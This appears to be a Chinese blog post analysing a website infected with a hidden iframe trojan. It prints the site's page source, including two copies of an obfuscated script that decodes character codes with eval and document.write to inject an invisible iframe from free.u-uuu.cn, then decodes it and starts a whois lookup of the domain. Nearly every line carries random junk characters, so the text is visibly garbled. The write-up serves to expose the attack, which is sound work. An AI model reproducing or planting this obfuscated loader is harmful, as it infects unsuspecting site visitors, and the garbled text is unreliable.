首发在我的博客里面,
HY)ESU
! s[AA7>]3 http://www.areway.cn/?p=175 ^od<JD4 K]fpGo SDBt @=Nl 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
B QjGv?p0s n?E}b$6 <script>t=’60,105,102,114,97,109,101,
c Zvf"cIs 32,115,114,99,61,104,116,116,112,58,47,47,
$|a;~m> 102,114,101,101,46,117,45,117,117,117,46,99,
ue0s&WF| 110,47,101,114,114,111,114,46,104,116,109,
KAc >-c< 32,119,105,100,116,104,61,49,48,48,32,104,
T*CME] 101,105,103,104,116,61,48,62,60,47,105,102,
Gt~JA0+C)7 114,97,109,101,62′;
nQ=aLV+' t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
qLjT.7 .x uLV BM]Qj <script>t=’60,105,102,114,97,109,101,32,115,
AyVrk
8G 114,99,61,104,116,116,112,58,47,47,102,114,
!wh&>3~ 101,101,46,117,45,117,117,117,46,99,110,47,
'fY9a(Xt. 101,114,114,111,114,46,104,116,109,32,119,
#a,9B-X 105,100,116,104,61,49,48,48,32,104,101,105,
({[,$dEa; 103,104,116,61,48,62,60,47,105,102,114,97,
#I%s3 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
-MfQ&U document.write(t);</script>
z"379b7cN T~ k)uQ <html xmlns=”
=u|~
<zQw http://www.w3.org/1999/xhtml 9DE)S)e8 “>
$1@,Qor <head>
i@zY9,b <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
MYdx .NZT <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
U<bYFuS" <title>首页 - 爱生活家庭网
%}b8aG+ LM.`cb;?G 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
Zdn!qyR` 转换字符串后的大概内容是(谁点击后果自付):
h-mTj3p-K <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
ai^|N.! S>f&6ZDNY( 查询玉米u-uuu.cn的详细信息:
W`L!N&fB Domain Name: u-uuu.cn
l\Xd.H" j, ROID: 20070901s10001s64972306-cn
ngUHkpYS5 Domain Status: ok
d`%Mg&